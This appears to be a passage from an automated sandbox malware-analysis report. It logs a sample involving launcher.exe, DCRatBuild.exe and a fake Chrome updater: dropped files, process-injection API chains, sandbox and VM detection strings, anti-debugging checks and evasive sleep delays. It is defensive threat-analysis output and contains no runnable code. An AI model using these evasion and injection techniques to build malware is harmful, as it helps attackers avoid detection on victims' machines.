Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

20_2_00007FF62DC310C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5997	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3798	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7141
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2433
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 9998
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9910
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9864
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7137
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2514

Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\ylbujkauzmzd.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Dropped PE file which has not been started: C:\fontdriversavescrt\ComComponentDriverInto.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_3-23598

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_28-20748
Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_6-22041
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_24-21279

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_20-449

Source: C:\Users\user\AppData\Local\Temp\launcher.exe	API coverage: 6.9 %
Source: C:\Windows\System32\lsass.exe	API coverage: 4.7 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.6 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 9.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6996	Thread sleep count: 5997 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7000	Thread sleep count: 3798 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\launcher.exe TID: 7088	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 6616	Thread sleep count: 228 > 30	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 6616	Thread sleep time: -228000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 5876	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912	Thread sleep count: 7141 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668	Thread sleep count: 2433 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6880	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6752	Thread sleep count: 9998 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6752	Thread sleep time: -9998000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7024	Thread sleep count: 9910 > 30
Source: C:\Windows\System32\lsass.exe TID: 7024	Thread sleep time: -9910000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7036	Thread sleep count: 67 > 30
Source: C:\Windows\System32\svchost.exe TID: 7036	Thread sleep time: -67000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 6740	Thread sleep count: 9864 > 30
Source: C:\Windows\System32\dwm.exe TID: 6740	Thread sleep time: -9864000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6828	Thread sleep count: 234 > 30
Source: C:\Windows\System32\svchost.exe TID: 6828	Thread sleep time: -234000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6996	Thread sleep count: 74 > 30
Source: C:\Windows\System32\svchost.exe TID: 6996	Thread sleep time: -74000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7004	Thread sleep count: 232 > 30
Source: C:\Windows\System32\svchost.exe TID: 7004	Thread sleep time: -232000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6984	Thread sleep count: 229 > 30
Source: C:\Windows\System32\svchost.exe TID: 6984	Thread sleep time: -229000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5840	Thread sleep count: 198 > 30
Source: C:\Windows\System32\svchost.exe TID: 5840	Thread sleep time: -198000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6796	Thread sleep count: 227 > 30
Source: C:\Windows\System32\svchost.exe TID: 6796	Thread sleep time: -227000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep count: 228 > 30
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep time: -228000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2744	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6712	Thread sleep count: 186 > 30
Source: C:\Windows\System32\svchost.exe TID: 6712	Thread sleep time: -186000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576	Thread sleep count: 7137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408	Thread sleep count: 2514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3816	Thread sleep count: 40 > 30
Source: C:\Windows\System32\svchost.exe TID: 3816	Thread sleep time: -40000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2092	Thread sleep count: 198 > 30
Source: C:\Windows\System32\svchost.exe TID: 2092	Thread sleep time: -198000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6392	Thread sleep count: 199 > 30
Source: C:\Windows\System32\svchost.exe TID: 6392	Thread sleep time: -199000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_0007A69B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0008C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_0008C220
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0009B348 FindFirstFileExA,	3_2_0009B348
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF166BE3C FindFirstFileExW,	6_2_000001EDF166BE3C
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E09FA8C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,terminate,GetFileInformationByHandleEx,GetLastError,CloseHandle,terminate,GetFileInformationByHandleEx,GetLastError,CloseHandle,terminate,CloseHandle,CloseHandle,terminate,	6_2_00007FF77E09FA8C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F88BE3C FindFirstFileExW,	24_2_000001881F88BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE6BE3C FindFirstFileExW,	28_2_00000264CDE6BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDECBE3C FindFirstFileExW,	28_2_00000264CDECBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC430BE3C FindFirstFileExW,	30_2_000001BEC430BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37FBE3C FindFirstFileExW,	31_2_0000023BF37FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D53BE3C FindFirstFileExW,	32_2_000001935D53BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55CBE3C FindFirstFileExW,	34_2_000001B1E55CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C9BE3C FindFirstFileExW,	34_2_000001B1E5C9BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFABBE3C FindFirstFileExW,	35_2_0000021CAFABBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB77BE3C FindFirstFileExW,	36_2_000001E7BB77BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7DBE3C FindFirstFileExW,	36_2_000001E7BB7DBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_000002356054BE3C FindFirstFileExW,	37_2_000002356054BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FCBE3C FindFirstFileExW,	38_2_00000293F7FCBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE818BE3C FindFirstFileExW,	39_2_000001ECE818BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C674BE3C FindFirstFileExW,	40_2_00000223C674BE3C

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_0008E6A3 VirtualQuery,GetSystemInfo,

3_2_0008E6A3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exe	Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000009.00000002.2713001615.0000000000974000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: wscript.exe, 00000009.00000003.2695334007.000000000098C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: lsass.exe, 0000001C.00000000.2462103777.00000264CD086000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: wscript.exe, 00000009.00000002.2713001615.0000000000974000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: lsass.exe, 0000001C.00000002.3734967113.00000264CD013000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2461701963.00000264CD013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\launcher.exe.bin.exe	API call chain: ExitProcess graph end node	graph_0-13
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	API call chain: ExitProcess graph end node	graph_3-23748
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node	graph_20-496

Source: C:\Users\user\AppData\Local\Temp\hs.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_0008F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0008F838

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00097DEE mov eax, dword ptr fs:[00000030h]

3_2_00097DEE

Source: C:\Users\user\Desktop\launcher.exe.bin.exe

Code function: 0_2_00401AE1 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,PathFindFileNameA,

0_2_00401AE1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\Google\Chrome\updater.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0008F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0008F838
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0008F9D5 SetUnhandledExceptionFilter,	3_2_0008F9D5
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0008FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0008FBCA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00098EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00098EBD
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF166B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_000001EDF166B50C
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF1667E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_000001EDF1667E70
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E0A06A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF77E0A06A4
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F887E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001881F887E70
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F88B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001881F88B50C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00000264CDE67E70
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00000264CDE6B50C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDEC7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00000264CDEC7E70
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDECB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_00000264CDECB50C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC4307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_000001BEC4307E70
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC430B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_000001BEC430B50C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000023BF37F7E70
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000023BF37FB50C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D53B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_000001935D53B50C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D537E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_000001935D537E70
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_000001B1E55CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_000001B1E55C7E70
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C9B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_000001B1E5C9B50C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C97E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_000001B1E5C97E70
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFAB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_0000021CAFAB7E70
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFABB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_0000021CAFABB50C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB777E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_000001E7BB777E70
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB77B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_000001E7BB77B50C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7D7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_000001E7BB7D7E70
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7DB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_000001E7BB7DB50C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_000002356054B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	37_2_000002356054B50C
